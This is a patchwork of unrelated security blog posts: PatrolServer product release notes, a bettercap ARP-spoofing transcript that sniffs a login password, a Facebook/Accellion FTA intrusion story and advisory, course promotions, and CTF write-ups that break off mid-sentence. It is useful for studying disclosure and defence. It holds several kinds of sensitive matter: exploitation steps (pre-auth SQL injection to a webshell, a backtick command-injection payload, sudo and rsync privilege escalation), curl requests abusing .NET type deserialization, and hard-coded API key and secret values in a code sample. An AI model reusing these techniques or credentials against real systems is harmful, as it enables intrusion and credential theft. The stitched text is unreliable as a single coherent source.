Today we’re releasing the Ignore functionality for your solution cards. That means you can take full control over what type of solutions you’d like to see. Just as importantly, you can now report false positives where needed.
Hide cards you no longer want to see
Imagine you would like to hide the WordPress update card like the one above. All it takes is a simple click on the Ignore button, and it will take you to a wizard-style menu where you can add constraints about ignoring that particular card.
It is possible to hide the card forever, or you can tell the filter to hide just that particular version (note, if a new version of the software gets released, the card will be visible again).
View hidden cards
When you’ve hidden solution cards, they are not really gone. As the word describes, they are just hidden. When one or more cards are no longer visible, an option will be shown to view your hidden cards. They’re present in the same format as regular ones.
If you no longer want a filter to be applied, take a look at the Filters view where you can remove your active filters.
I have been working on an online Burp Suite training for quite some time. It is finally ready.
It is based on the live Burp Suite workshop I held on conferences and for local meetup groups. You will get to know every module of the free edition of Burp and you will be able to try everything yourself with the WebGoat vulnerable web application. The course covers everything from setting up the test environment to trying most of the functionalities of Burp. It was also reviewed by Portswigger, the company behind Burp and they also mention it on their trainings site, so I guess they approve :). So check it out and don’t hesitate to give me feedback: http://hackademy.aetherlab.net
I recently discovered a fairly new man-in-the-middle tool called bettercap, which I will test in this video. I will explain the concept of ARP spoofing, install bettercap, and see how one can use it to sniff passwords on a network.
If you need here is the full transcript of the video:
Hello there. My name is Gergely Revay or Geri. Today I’m gonna talk about bettercap. This is a new tool I found recently and it got my attention because it’s a man in the middle tool. And we talk about man in the middle attacks all the time like in an assessment when we say it’s bad to send stuff unencrypted on the network because a man in the middle attacker can then sniff your network and find out your passwords or anything. When I found this tool, I thought this would be a good opportunity to play a little bit with man in the middle attacks. So what I’m gonna do today is introduce bettercap, talk a little bit about network sniffing and ARP poisoning for those people who don’t really know what that is and how it works, and then we’ll install and try bettercap, the basic features. We’ll sniff network a little bit to find some passwords and talk about what bettercap is capable of.
So let’s start with the installation. So you can see here already, I have the bettercap website on my screen. And basically the installation is not that difficult because you can just use Ruby GEM to install. Bettercap is actually a full Ruby application and you can extend it in Ruby. So it’s good for you if you know Ruby well. Now, the installation is also documented in the website so you can check it out and also do it yourself. So let’s go to a terminal. First, I’m gonna install the dependencies, which some of it is already installed in Kali but I’m not gonna check exactly and just go on with the installation. And then it’s build essential Ruby development packages and libpcap for manipulating traffic. Yeah. So now we have the dependencies. Then let’s get on with the installation of bettercap. And it’s gem install bettercap. It’s gonna take a little bit so just be patient. Okay, the installation is ready so let’s see if we can execute it. Yes. So that’s how it works. That’s a good start.
Now, before I start getting into bettercap, I will just explain quickly how this network sniffing works, how ARP poisoning works, etc. For that, let me draw for you. So what happens here, I’m gonna use two computers, the Kali what you’ve seen and a Windows 8 machine. These are both virtual machines and they’re both on the same network. So what it essentially means is that we have Internet there. And then I have a router here. I have here my Kali and I have here my victim. So normally the victim communicates with the router directly and then that goes to the Internet.That goal that we want to reach is that this communication goes to Kali and then to the router. Now, bettercap offers different methods to do this. What we are gonna use is ARP poisoning, which means that Kali has a MAC address here. It’s called MAC K, let’s call it this way. He has a MAC V, and this has a MAC R. So these are normal MAC addresses that you already know. When the victim wants to go to the Internet, he has to first send the packets to the router. So what he will ask, he will know the IP address of the router, but he wants to find out what the MAC address for that IP address so that he can send the packet. He will ask the network what is the MAC address for that particular IP address.
Now, what bettercap does is whenever such a request happens, then he will always respond hopefully as the first responder. He always say that my MAC address is for that IP. So whenever the victim or the router or anybody else on this network asks for IP address or asks for the MAC address of an IP address, our attacker with bettercap will always say that my MAC address is related to this IP address. That way, basically, the victim is gonna think that on the network he has to send his packet first here because he will think that this is the router and then bettercap will relay this packet to the router but also when a packet comes back, the router will also think — because he will also request a MAC address – he will also think that Kali or bettercap is the victim. And then Kali will just relay again the packet to the victim. So we basically reached our goal here. Because of this ARP spoofing or ARP poisoning, all packets will cross our Kali machine through bettercap and then from this point on, basically bettercap is able to do whatever he wants with those packets. Bettercap also offers different tools to do different things with the traffic, but what we’re gonna try is just to look at the traffic find valuable information like passwords. So I hope that’s clear now, and I will just move on to working with bettercap and see how we can actually do a man in the middle attack.
So let’s look at our target first or our victim. So what I’m gonna try to do is to try to intercept the traffic of this victim. We are gonna try to intercept the HTTP traffic to a particular website is cheezburger.com. I chose this website mostly because I don’t use tis application. So we can login here. I will just do it first as a normal user, and then we will try to intercept that again with bettercap. So the user is [email protected]. This is my old website. Okay, you see I successfully logged in. Now we’re gonna try to intercept the same thing with bettercap. So I’ll log out, even close my browser.
So now what we have to do is to come back to Kali and start bettercap with the proper configuration to do the spoofing for us. So first we need bettercap. And then we want to sniff the network so we use the sniffer. And then as I said, you can use different techniques for spoofing. The default is the ARP spoofing, but I will specify it here anyway so you just have it on the comment line. And since we are gonna work with HTTP and HTTPS traffic probably, I will use the HTTP and HTTPS proxies offered by bettercap. And for that, you say proxy http and minus minus proxy https. And there are different parsers in bettercap. What I’m gonna use now is the custom parser. And I will look for something like “password” in the traffic. And then we hope that the password for Cheezburger.com is gonna be called by bettercap.
So let’s start the sniffing. What you see here is that bettercap started. First it tries to figure out the targets on the networks so which one is the gateway, which one’s on the other machine on the network so that he can spoof these machines on the network. Because we chose the HTTPS proxy, it will also generate a certificate for itself to try to avoid recognition. Of course, this is not a real valid Google.com certificate. It’s a fake, but it could be useful. So let’s go back to the victim’s machine. Let’s load Cheezburger. Now you see there are already lots of things happening here. You see all this content because that’s HTTP and that’s what we are looking for. You can also see that it’s from many different places. The thing is that the website is just full of different content from different websites so that’s why the requests go to basically everywhere all around the Internet and not only to Cheezburger.com.
Let’s try to login. So the user is [email protected]. Okay, and I will just quickly change back to Kali. Again, lots of things happened. Let’s just try to find our password. This looks interesting. This is a GET request to the LoginOrRegister service. And if you look through for the password, whatever, whatever, oh, here is, this is the e-mail address. So this is username. And oh, what we can see here is the password, and this is actually the password I used. So it worked out. Of course, you know, you have to really look at the traffic. Scroll here, scroll there, but it worked.
Another thing that I would like to mention is that originally I actually wanted to spoof HTTPS traffic, and I started to play with Cheezburger. And it turned out that it uses just HTTP so this password is not even encrypted on the network which is general bad. But yeah, it’s Cheezburger.com so I didn’t have really high expectations. But the point is that our network spoofing was successful. We were able to attract all traffic between the router and the victim computer to Kali, to bettercap. We were able to actually sniff the password of the user during the login. So that’s very good. That was our goal.
One really important thing is that when you close bettercap, you need to gracefully exit which is implemented when you do Ctrl+C because the thing is that ARP poisoning is actually poisoning the ARP cache of the other computers so before you exit, you have to change back the MAC addresses of their caches to the original one. Otherwise, the network will just die for some time until they figure out that the MAC address in the cache is wrong and then request for new MAC addresses. So it’s always important if you do ARP poisoning that you gracefully exit from the tool.
Another thing that I would like to mention is that bettercap is trying to be extensible. So
if you come here to the library and you look around a little bit, then you will see everything that you could use is here and you can start implementing your old things. You can start to implement your own proxy to do like portable things with the request like change the content of the request or change the content of the response automatically so then you don’t have to like look in the logs to find the password. You can just done the password for yourself automatically or you can manipulate every response so that the user sees something else. So there are lots of possibilities here. And I think @evilsocket, the guy who writes bettercap, he did a really good job here. So if you find this interesting, you can start playing with bettercap as well. If you do something cool like write your own proxy tool or any kind of extension, then let me know or comment here so that everybody knows that there’s something new here. Or if you discover something interesting, also just comment on this post. That’s it. I was Geri Revay from Aether Security Labs and take care. Keep hacking. Ciao.
As a pentester, I love server-side vulnerabilities more than client-side ones. Why? Because it’s way much cooler to take over the server directly and gain system SHELL privileges. <( ̄︶ ̄)>
Of course, both vulnerabilities from the server-side and the client-side are indispensable in a perfect penetration test. Sometimes, in order to take over the server more elegantly, it also need some client-side vulnerabilities to do the trick. But speaking of finding vulnerabilities, I prefer to find server-side vulnerabilities first.
With the growing popularity of Facebook around the world, I’ve always been interested in testing the security of Facebook. Luckily, in 2012, Facebook launched the Bug Bounty Program, which even motivated me to give it a shot.
From a pentester’s view, I tend to start from recon and do some research. First, I’ll determine how large is the “territory” of the company on the internet, then…try to find a nice entrance to get in, for example:
What can I find by Google Hacking?
How many B Class IP addresses are used? How many C Class IPs?
Whois? Reverse Whois?
What domain names are used? What are their internal domain names? Then proceed with enumerating sub-domains
What are their preferred techniques and equipment vendors?
Any data breach on Github or Pastebin?
…etc
Of course, Bug Bounty is nothing about firing random attacks without restrictions. By comparing your findings with the permitted actions set forth by Bug Bounty, the overlapping part will be the part worth trying.
Here I’d like to explain some common security problems found in large corporations during pentesting by giving an example.
For most enterprises, “Network Boundary” is a rather difficult part to take care of. When the scale of a company has grown large, there are tens of thousands of routers, servers, computers for the MIS to handle, it’s impossible to build up a perfect mechanism of protection. Security attacks can only be defended with general rules, but a successful attack only needs a tiny weak spot. That’s why luck is often on the attacker’s side: a vulnerable server on the “border” is enough to grant a ticket to the internal network!
Lack of awareness in “Networking Equipment” protection. Most networking equipment doesn’t offer delicate SHELL controls and can only be configured on the user interface. Oftentimes the protection of these devices is built on the Network Layer. However, users might not even notice if these devices were compromised by 0-Day or 1-Day attacks.
Security of people: now we have witnessed the emergence of the “Breached Database” (aka “Social Engineering Database” in China), these leaked data sometimes makes the penetration difficulty incredibly low. Just connect to the breach database, find a user credential with VPN access…then voilà! You can proceed with penetrating the internal network. This is especially true when the scope of the data breach is so huge that the Key Man’s password can be found in the breached data. If this happens, then the security of the victim company will become nothing. :P
For sure, when looking for the vulnerabilities on Facebook, I followed the thinking of the penetration tests which I was used to. When I was doing some recon and research, not only did I look up the domain names of Facebook itself, but also tried Reverse Whois. And to my surprise, I found an INTERESTING domain name:
tfbnw.net
TFBNW seemed to stand for “TheFacebook Network”
Then I found bellow server through public data
vpn.tfbnw.net
WOW. When I accessed vpn.tfbnw.net there’s the Juniper SSL VPN login interface. But its version seemed to be quite new and there was no vulnerability can be directly exploited…nevertheless, it brought up the beginning of the following story.
It looked like TFBNW was an internal domain name for Facebook. Let’s try to enumerate the C Class IPs of vpn.tfbnw.net and found some interesting servers, for example:
Mail Server Outlook Web App
F5 BIGIP SSL VPN
CISCO ASA SSL VPN
Oracle E-Business
MobileIron MDM
From the info of these servers, I thought that these C Class IPs were relatively important for Facebook. Now, the whole story officially starts here.
Vulnerability Discovery
I found a special server among these C Class IPs.
files.fb.com
↑ Login Interface of files.fb.com
Judging from the LOGO and Footer, this seems to be Accellion’s Secure File Transfer (hereafter known as FTA)
FTA is a product which enables secure file transfer, online file sharing and syncing, as well as integration with Single Sign-on mechanisms including AD, LDAP and Kerberos. The Enterprise version even supports SSL VPN service.
Upon seeing this, the first thing I did was searching for publicized exploits on the internet. The latest one was found by HD Moore and made public on this Rapid7’s Advisory
Whether this vulnerability is exploitable can be determined by the version information leaked from “/tws/getStatus”. At the time I discovered files.fb.com the defective v0.18 has already been updated to v0.20. But from the fragments of source code mentioned in the Advisory, I felt that with such coding style there should still be security issues remained in FTA if I kept looking. Therefore, I began to look for 0-Day vulnerabilities on FTA products!
Actually, from black-box testing, I didn’t find any possible vulnerabilities, and I had to try white-box testing. After gathering the source codes of previous versions FTA from several resources I could finally proceed with my research!
The FTA Product
Web-based user interfaces were mainly composed of Perl & PHP
The PHP source codes were encrypted by IonCube
Lots of Perl Daemons in the background
First I tried to decrypt IonCube encryption. In order to avoid being reviewed by the hackers, a lot of network equipment vendors will encrypt their product source codes. Fortunately, the IonCube version used by FTA was not up to date and could be decrypted with ready-made tools. But I still had to fix some details, or it’s gonna be messy…
After a simple review, I thought Rapid7 should have already got the easier vulnerabilities. T^T
And the vulnerabilities which needed to be triggered were not easy to exploit. Therefore I need to look deeper!
Finally, I found 7 vulnerabilities, including
Cross-Site Scripting x 3
Pre-Auth SQL Injection leads to Remote Code Execution
Known-Secret-Key leads to Remote Code Execution
Local Privilege Escalation x 2
Apart from reporting to Facebook Security Team, other vulnerabilities were submitted to Accellion Support Team in Advisory for their reference. After vendor patched, I also sent these to CERT/CC and they assigned 4 CVEs for these vulnerabilities.
CVE-2016-2350
CVE-2016-2351
CVE-2016-2352
CVE-2016-2353
More details will be published after full disclosure policy!
↑ Using Pre-Auth SQL Injection to Write Webshell
After taking control of the server successfully, the first thing is to check whether the server environment is friendly to you. To stay on the server longer, you have to be familiar with the environments, restrictions, logs, etc and try hard not to be detected. :P
There are some restrictions on the server:
Firewall outbound connection unavailable, including TCP, UDP, port 53, 80 and 443
Remote Syslog server
Auditd logs enabled
Although the outbound connection was not available, but it looked like ICMP Tunnel was working. Nevertheless, this was only a Bug Bounty Program, we could simply control the server with a webshell.
Was There Something Strange?
While collecting vulnerability details and evidences for reporting to Facebook, I found some strange things on web log.
First of all I found some strange PHP error messages in “/var/opt/apache/php_error_log”
These error messages seemed to be caused by modifying codes online?
↑ PHP error log
I followed the PHP paths in error messages and ended up with discovering suspicious WEBSHELL files left by previous “visitors”.
The first few ones were typical PHP one-line backdoor and there’s one exception: “sclient_user_class_standard.inc”
In include_once “sclient_user_class_standard.inc.orig” was the original PHP app for password verification, and the hacker created a proxy in between to log GET, POST, COOKIE values while some important operations were under way.
A brief summary, the hacker created a proxy on the credential page to log the credentials of Facebook employees. These logged passwords were stored under web directory for the hacker to use WGET every once in a while
From this info we can see that apart from the logged credentials there were also contents of letters requesting files from FTA, and these logged credentials were rotated regularly (this will be mentioned later, that’s kinda cheap…XD)
And at the time I discovered these, there were around 300 logged credentials dated between February 1st to 7th, from February 1st, mostly “@fb.com” and “@facebook.com”. Upon seeing it I thought it’s a pretty serious security incident. In FTA, there were mainly two modes for user login
Regular users sign up: their password hash were stored in the database and hashed encrypted with SHA256+SALT
All Facebook employees (@fb.com) used LDAP and authenticated by AD Server
I believe these logged credentials were real passwords and I GUESS they can access to services such as Mail OWA, VPN for advanced penetration…
In addition, this hacker might be careless:P
The backdoor parameters were passed through GET method and his footprinting can be identified easily in from web log
When the hacker was sending out commands, he didn’t take care of STDERR, and left a lot of command error messages in web log which the hacker’s operations could be seen
From access.log, every few days the hacker will clear all the credentials he logged
Packing files
Enumerating internal network architecture
Use ShellScript to scan internal network but forgot to redirect STDERR XD
Attempt to connect internal LDAP server
Attempt to access internal server
(Looked like Mail OWA could be accessed directly…)
Attempt to steal SSL Private Key
After checking the browser, the SSL certificate of files.fb.com was *.fb.com …
Epilogue
After adequate proofs had been collected, they were immediately reported to Facebook Security Team. Other than vulnerability details accompanying logs, screenshots and timelines were also submitted xD
Also, from the log on the server, there were two periods that the system was obviously operated by the hacker, one in the beginning of July and one in mid-September
the July one seemed to be a server “dorking” and the September one seemed more vicious. Other than server “dorking” keyloggers were also implemented. As for the identities of these two hackers, were they the same person? Your guess is as good as mine. :P
The time July incident happened to take place right before the announcement of CVE-2015-2857 exploit. Whether it was an invasion of 1-day exploitation or unknown 0-day ones were left in question.
Here’s the end of the story, and, generally speaking, it was a rather interesting experience xD
Thanks to this event, it inspired me to write some articles about penetration :P
Last but not least, I would like to thank Bug Bounty and tolerant Facebook Security Team so that I could fully write down this incident : )
Timeline
2016/02/05 20:05 Provide vulnerability details to Facebook Security Team
2016/02/05 20:08 Receive automatic response
2016/02/06 05:21 Submit vulnerability Advisory to Accellion Support Team
2016/02/06 07:42 Receive response from Thomas that inspection is in progress
2016/02/13 07:43 Receive response from Reginaldo about receiving Bug Bounty award $10000 USD
2016/02/13 Asking if there anything I should pay special attention to in blog post ?
2016/02/13 Asking Is this vulnerability be classify as a RCE or SQL Injection ?
2016/02/18 Receive response from Reginaldo about there is a forensics investigation, Would you be able to hold your blog post until this process is complete?
2016/02/24 Receive response from Hai about the bounty will include in March payments cycle.
2016/04/20 Receive response from Reginaldo about the forensics investigation is done
What better way to start the summer than with a brand new release of PatrolServer, we’ve very proud to announce version 1.1.0 is now available to all of you.
No matter how you use PatrolServer, whether it’s the API, or our dashboard and scanner, you’re going to love this new version. We integrated the most requested features, polished both the front and back-end and made the entire experience a whole lot faster. We put a strong focus on developers past months, keep on reading for more exciting news. You’ll love this as much as we do, for sure!
Filtering
Technically speaking, filtering cards is not a new feature, it has been enabled for most accounts for the past few months. Today, the feature is officially out of beta phase. We’ve been tweaking the ability to filter cards under the hood, as well as restoring cards is now possible by clicking the “restore” button. Below is a small demonstration on how you can filter out unwanted cards.
Verification with Bash Scanner
In the previous version, verifying your server was only possible by us sending an email to the administrator account of the domain or by uploading a HTML file to your server. We decided to put Bash Scanner a little more in the spotlight (seriously, you’ll benefit the best of the features when installing Bash Scanner), thus the new default verification method is now by using the scanner.
If you prefer to use alternative methods such as uploading the HTML file or by using email, they are still there under the “Alternate methods” tab.
Reminders
Server reminders has been the most requested feature of the past few months. Basically what it does is, at each chosen interval (either weekly or monthly), we’ll send you a reminder of all the issues on your servers over various mails. The new “Mail settings” page gives you more control over what emails you’ll get and which ones you’d like to exclude.
Analytics
You can now see detailed analytics data for your scanned servers. It might take some time until PatrolServer gathered enough information over a various amount of time, but analytics gives you a status over time of your current servers.
We also got graphs available to display the amount of exploits and vulnerabilities over time, but we leave those up to you to discover. If you’d like to visit the brand new analytics page, click on your server name on the left top, and select “Graphs”, it’s next under the filter view.
Looking at our own internal analytics has been a lot of fun, we hope you like them as much as we do!
For Developers
Brand new API documentation
PatrolServer is a service for developers to keep track of outdated software on their servers. We run a daily scan on your servers, to make sure you run updated software. We would like to make it easy for you developers to integrate with our services and delivery across many platforms. Our powerful APIs are here to provide you a smooth integration with your own project. Our developer tools allow you to access your own data within the PatrolServer architecture. Our ultimate goal is to cover most virtual facets of PatrolServer, for you to integrate whenever you want.
Developers can now enjoy the brand new API documentation pages. They are much more structured and provide examples for all interactions with the PatrolServer API.
The PHP SDK provides a stable interface to implement PatrolServer functionality in your own applications. The SDK makes integration child’s play. Take a look at the example below on how easy it is to intercept when your server finished scanning. You can do all kind of interactions after.
// Use the Singleton or create a separate PatrolSdk\Patrol object
use PatrolSdk\Singleton as Patrol;
Patrol::setApiKey('194786f61ea856b6468c0c41fa0d4bdb');
Patrol::setApiSecret('DC360a34e730ae96d74f545a286bfb01468cd01bb191eed49d9e421c2e56f958');
Patrol::webhook('scan_finished', function ($event) {
$server_id = $event['server_id'];
if ($server_id) {
// Get the Server object from the server_id
$server = Patrol::server($server_id);
// Get the installed software
$software = $server->allSoftware();
}
});
Take a look at the PatrolServer PHP SDK on GitHub, we’ve also written a Laravel Facade with various other features such as automatically updating composer modules the moment they become outdated.
Under the hood
We detect a whole lot more software than ever before, thus we had to tweak performance in order to provide the same smooth experience as before. The team and I have rewritten card generation from scratch, with better performance in mind. We now extensively rely on caching mechanisms, as well as pre-generating data when users are the least active on our platform (eg; at midnight, we perform more resource heavy tasks than during the day).
On average, resource heavy actions are at-least 60% faster than before.
Nowadays, we support a vast majority of the most popular npm modules. We’ve added 80.000 more npm modules to the scanner and we’re counting. The PatrolServer scanner is able to find over 160.000 different installed software (+ modules, packages, …) on your server.
Feel free to give our new changes a try, and as always, thank you for using PatrolServer!
Changelog:
Send me mails about my server status (setting)
Send me mails about PatrolServer news (setting)
Remind me about my server statusses (setting)
Quick link from account settings to API settings
Remove account (setting)
Webhooks event log viewer
Bash Scanner is first verification option
Support phpMyAdmin
Support Joomla!
npm now has +30.000 modules
Support Magento
Card creation from scan results is rewritten from scratch
Accellion File Transfer Appliance (FTA) is a secure file transfer service which enables users to share and sync files online with AES 128/256 encryption. The Enterprise version further incorporates SSL VPN services with integration of Single Sign-on mechanisms like AD, LDAP and Kerberos.
Vulnerability Details
In this research, the following vulnerabilities were discovered on the FTA version FTA_9_12_0 (13-Oct-2015 Release)
Cross-Site Scripting x 3
Pre-Auth SQL Injection leads to Remote Code Execution
Known-Secret-Key leads to Remote Code Execution
Local Privilege Escalation x 2
The above-mentioned vulnerabilities allow unauthenticated attackers to remotely attack FTA servers and gain highest privileges successfully. After the attackers fully controlled the servers, they will be able to retrieve the encrypted files and user data, etc.
After reporting to CERT/CC, these vulnerabilities were assigned 4 CVEs (CVE-2016-2350, CVE-2016-2351, CVE-2016-2352, CVE-2016-2353).
Areas Affected
According to a public data reconnaissance, there are currently 1,217 FTA servers online around the world, most of which are located in the US, followed by Canada, Australia, UK, and Singapore.
Determine from the domain name and SSL Certificate of these servers, FTA is widely used by governmental bodies, educational institutions, enterprises, including several well-known brands.
Pre-Auth SQL Injection leads to RCE (CVE-2016-2351)
After code reviewing, a pre-authentication SQL Injection vulnerability was found in FTA. This vulnerability grants malicious users access to sensitive data and personal information on the server through SQL Injection, and launch remote code execution (RCE) by further exploiting privilege-escalating vulnerabilities.
The key to this problem lies in the client_properties( ... ) function called by security_key2.api!
/home/seos/courier/security_key2.api
Among these parameters, $g_app_id$g_username$client_id and $password are controllable by the attackers. And although the function _decrypt( ... ) handles the passwords, it does not involve in the triggering of the vulnerability.
One thing to pay special attention is that the value of $g_app_id will be treated as a global variable which represents the current Application ID in use, and will be applied in opendb( ) accordingly. The code in opendb( ) includes the following lines:
In mysql_select_db, the name of the database to be opened is controllable by the user. If wrong value was given, the program will be interrupted. Therefore, $g_app_id must be forged correctly.
The following lines are the most important function client_properties( $client_id ).
The parameters passed onto the function client_properties( ... ) will be assembled into SQL statements. Among all the functions joining the assembling, construct_where_clause( ... ) is the most crucial one.
In the function construct_where_clause( ... ), every parameter is protected by the string mysql_real_escape_string except for $client_id. Judging from the coding style of the source code, it might be a result of oversight. Therefore, SQL Injection can be triggered by sending out corresponding parameters according to the program flow.
In addition, FTA database user has root privileges with FILE_PRIV option enabled. By exploiting INTO OUTFILE and writing their own PHP code to write-enabled directory, user will be able to execute code remotely!
PoC
The created PHP file will be located at
http://<fta>/courier/themes/templates/.cc.php
Known-Secret-Key leads to Remote Code Execution
In the previous vulnerability, one requirement to execute code remotely is the existence of a write-enabled directory for injecting webshell. But in reality, chances are there is no write-enabled directory available, thus fail to execute code through SQL Injection. But there is another way to help us accomplish RCE.
The precondition of this vulnerability is Known-Secret-Key stored in the database
This is not a problem, since the database can be accessed with the SQL Injection vulnerability mentioned earlier. Also, although there are some parameter filters in the code, they can be bypassed!
/home/seos/courier/sfUtils.api
If Known-Secret-Key has been acquired, the output of decrypt( $_POST[fc] ) will be controllable. And despite that the succeeding regular expressions work as a function name whitelist filter, they do not filter parameters.
Therefore, the only restriction for injecting random codes in the parameters is to exclude () in the strings. But thanks to the flexible characteristic of PHP, there are lots of ways to manipulate, just to name two examples here.
Execute system commands directly by using backticks (`)
user_profile_auth(`$_POST[cmd]`);
A more elegant way: use the syntax INCLUDE to include the tmp_name of the uploaded files, so that any protection will give way.
Local Privilege Escalation (CVE-2016-2352 and CVE-2016-2353)
After gaining PHP page privileges, we discovered that the privileges were assigned to user nobody. In order to engage in advanced recon, the web environment had been observed. After the observation, two possible privilege escalation vulnerabilities were identified.
1. Incorrect Rsync Configuration
/etc/opt/rsyncd.conf
The module name soggycat is readable and writable to anyone for the directory /home/soggycat/, therefore the SSH Key can be written into /home/soggycat/.ssh/ and then use the soggycat credential to login.
2. Command Injection in “yum-client.pl”
To enable system updates through web UI, the sudoers configuration in FTA exceptionally allows the user nobody to directly execute commands with root privileges and update software with the program yum-client.pl.
/etc/sudoers
YUM_CLIENT is the command for proceeding updates. Part of the codes are as follows:
/usr/local/bin/yum-client.pl
After taking a closer look on ymm-client.pl, a Command Injection vulnerability was found on the parameter --cdrom. This vulnerability enables attackers to inject any commands into the parameter and execute as root.
Thus, using the commands below
will grant execution freely as root!
Backdoor
After gaining the highest privilege and carrying out server recon, we identified that several backdoors had been already planted in FTA hosts. One of them is an IRC Botnet which had been mentioned in Niara’s Accellion File Transfer Appliance Vulnerability.
Apart from that, two additional PHP Webshells of different types which had NEVER been noted in public reports were also identified. Through reviewing Apache Log, these backdoors might be placed by exploiting the CVE-2015-2857 vulnerability discovered in mid-2015.
One of the backdoors is PHPSPY, it is found on 62 of the online hosts globally. It was placed in
The other is WSO, found on 9 of the online hosts globally, placed in
https://<fta>/courier/themes/templates/imag.php
Acknowledgement
The vulnerability mentioned in this Advisory was identified in early 2016 while looking for vulnerabilities in Facebook, you can refer to the article “How I Hacked Facebook, and Found Someone’s Backdoor Script”.
Upon discovering the FTA vulnerability in early February, I notified Facebook and Accellion and both were very responsive. Accellion responded immediately, issuing patch FTA_9_12_40 on February 12th and notifying all affected customers about the vulnerability and instructions to install the patch. Accellion has been very communicative and cooperative throughout this process.
Timeline
Feb 6, 2016 05:21 Contact Accellion for vulnerability report
Feb 7, 2016 12:35 Send the report to Accellion Support Team
Mar 3, 2016 03:03 Accellion Support Team notifies patch will be made in FTA_9_12_40
May 10, 2016 15:18 Request Advisory submission approval and report the new discovery of two backdoors to Accellion
Jun 6, 2016 10:20 Advisory finalized by mutual consent
I get the question a lot, how to get into pentesting. I think the shortest way to do that is through web pentesting and in this post I will explain why do I think that.
I have three main reasons why I think learning web assessment is the fastest way to get into the pentesting business:
1) Web is everywhere.
I don’t know whether you noticed but more or less everything has a web interface. And I am not talking about the normal web applications on the Internet, which by the way would still provide enough work for all current pentesters for their lifetime. I also mean IoT and embedded devices. Have you noticed for instance that when you withdraw money from an ATM it gives you the same clicking sound as old Internet Explorers. They do that because they run old Internet Explorers :). So they are basically web applications running in an ATM looking box. Also basically 99 % of embedded devices have a web interface. Like trains, cars, home control systems, your fridge, etc…
2) Market demand
The most trivial attack surface of a product or company is their website and there were quite a few hyped attacks in the past couple of years. So when you ask somebody what they would protect first, they would say that their website. All these built up an acceptable level of security aweraness in the web world. This is still lacking for instance in the embedded or control system world. These led to a very high market demand for web assessments. I think right now it is very difficult to find a pentesting job where you wouldn’t do web assessments. Even if you do a network assessment, you will find web application in the network that you will need to test. Most of the consulting companies have around 80% web assessments.
3) The “easiest” to learn
Compared to the other fields of security assessments, web is a very pentester friendly topic. Starting with the fact that HTTP is a plain text protocol. It is much easier and faster to manipulate general web application traffic then some weird proprietary protocol. Also easier then reversing a binary and exploiting a buffer overflow. Although these are also super interesting topics, I only say that web is the easiest to learn.
Probably there are hundreds of other reasons why to learn web pentesting, but I think these are the most significant. And with that let me elegantly change the topic to promote my own course. Ohh, did I just say that out loud. Damn. Anyways, you knew already that I was working on it. So I created a full blown web hacking course cleverly called Web Hacking – Become a Web Pentester. Check it out, there is a Promo video where I explain everything and there are quite a few preview lecture that anybody can watch. The normal price is $180, but for my readers I created a coupon code the give you the course for %50 off. So use the following link: http://aetherlab.net/y/ho
or the use the coupon code: HALFOFF
Otherwise let me know what you think about web pentesting.
You’re provided with a big zip file that contains mostly dot net libraries and a few challenge specific ones. Since the name of the challenge hints to be a .Net reversing challenge I focused on DCTFNetCoreWebApp.dll.
I used dotPeek to decompile it and found the following:
DCTFNetCoreWebApp: Mostly some logic to get the webapp running.
DCTFNetCoreWebApp.Business: Contains the API logic (the Executor class). This contains the allowed actions as well (Notice how getflag is considered an AdminCommand).
DCTFNetCoreWebApp.Controllers: Parser for GET/POST requests revealing the route (/api/command)
abatchy@ubuntu:~/Desktop$ curl https://dotnot.dctf-quals-17.def.camp/api/command
Hi! Nothing here :)
DCTFNetCoreWebApp.Models: Models defining the command layout which we’ll need to communicate with the API.
The meat of the code is the Execute method:
publicCommandExecute(Commandcommand){// Need to be authenticatedif(this._guestActions.Contains(command.Action.ToLower()))returnthis.Authenticate(command);if(!this.IsAuthenticated(command))thrownewException("Authentication required!");// Is the command of type AdminCommand?boolflag=((MemberInfo)command.GetType()).get_Name().Equals(((MemberInfo)typeof(AdminCommand)).get_Name());if(this._adminActions.Contains(command.Action.ToLower())&&!flag)thrownewException("Command not allowed!");if(!this._userActions.Contains(command.Action.ToLower())&&!flag)thrownewException("Invalid action");stringlower=command.Action.ToLower();if(lower=="get")returnthis.Get(command);if(lower=="set")returnthis.Set(command);if(lower=="list")returnthis.List(command);if(lower=="readflag")returnthis.ReadFlag(command);thrownewException("Command not implemented!");}
You need to be authenticated.
Command needs to be of AdminCommand type (inherited).
Let’s try first just contacting the API with a command. Parser for POST:
abatchy@ubuntu:~/Desktop$ curl -X POST -H"Content-Type: application/json"-d'{"Command":{"UserId":"da268d19-b985-4779-bbdf-736ee4ec9b32", "Action":"Readflag" } }' https://dotnot.dctf-quals-17.def.camp/api/command
Command not allowed!
So unfortunately this command fails as the flag is set to false. We need to cast the JSON to an AdminCommand using $type field.
I tried setting it to DCTFNetCoreWebApp.Models.AdminCommand but it returned an error message.
abatchy@ubuntu:~/Desktop$ curl -X POST -H"Content-Type: application/json"-d'{"$type":"DCTFNetCoreWebApp.Models.AdminCommand", "Command":{"UserId":"da268d19-b985-4779-bbdf-736ee4ec9b32", "Action":"Readflag" } }' https://dotnot.dctf-quals-17.def.camp/api/command
Type specified in JSON 'DCTFNetCoreWebApp.Models.AdminCommand' was not resolved. Path '$type', line 1, position 48.
Then I thought of casting it to a known class that definitely exists, maybe the error shows any data.
abatchy@ubuntu:~/Desktop$ curl -X POST -H"Content-Type: application/json"-d'{"Command":{"$type":"System.Guid", "UserId":"da268d19-b985-4779-bbdf-736ee4ec9b32", "Action":"Readflag" } }' https://dotnot.dctf-quals-17.def.camp/api/command
Type specified in JSON 'System.Guid, System.Private.CoreLib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=7cec85d7bea7798e' is not compatible with 'DCTFNetCoreWebApp.Models.Command, DCTFNetCoreWebApp, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null'. Path 'Command.$type', line 1, position 33.
Nice! We got the full type to use, replace Request with AdminCommand and we’re good to go.
The python code provided allows you to make a single move then it makes some predefined moves. The goal was a bit confusing to me at first as I wasn’t sure if they wanted the position of the king after the first move only (assuming it survided) or its final position regardless. It was the latter.
I tweaked the code a bit so that it tries all the possible (wrong) moves that would matter, which are the king’s only, moving other pieces is irrelevant. So basically:
Make king move from e1 to X ([a-h][1-8]).
Let bot make moves.
If king survived after those moves, add its position to a set list.
This sloppy code does it:
